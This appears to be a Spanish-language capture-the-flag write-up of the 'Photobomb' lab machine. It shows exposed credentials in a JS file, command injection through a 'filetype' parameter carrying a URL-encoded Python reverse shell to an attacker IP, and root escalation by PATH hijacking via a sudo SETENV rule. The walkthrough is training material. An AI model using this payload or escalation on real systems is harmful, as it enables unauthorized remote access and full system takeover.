Enumerando la web

Nos metemos a la URL, sin antes cambiar el archivo /etc/hosts.

Vemos un login sencillo al hacer clic en clic here!, pero no contamos con credenciales.

Inspeccionamos el código fuente, y encontramos un archivo photobomb.js, y unos credenciales ahí por si acaso.

Nos encontramos con una impresora de fotos, nos permite descargar con diferentes tamaños de resolucion en formato jpg y png.

Es hora de sacar el BurpSuite y ver a fondo que ocurre con esta petición al descargarnos fotos.

Haciendo pruebas con la herramienta, notamos que el parametro filetype se lo come con patatas, aca ingresamos una nuestra reverse Shell y escuchamos en:

$ nc -nlvp 4443

Shell usada para este caso, sin embargo hay muchas más en Google

python3%20-c%20'import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<tun0-IP>",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Una vez dentro proseguimos al obtener una bash

$$ sudo -l

  Matching Defaults entries for wizard on photobomb:
  env_reset, mail_badpass,
  secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User wizard may run the following commands on photobomb:
  (root) SETENV: NOPASSWD: /opt/cleanup.sh

$$ cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} ;

notamos que al final del scrip en /opt/cleanup.sh ejecutamos chown root:root

$$ id
uid=1000(wizard) gid=1000(wizard) groups=1000(wizard)
$ sudo PATH=/tmp:$PATH /opt/cleanup.sh
id
uid=0(root) gid=0(root) groups=0(root)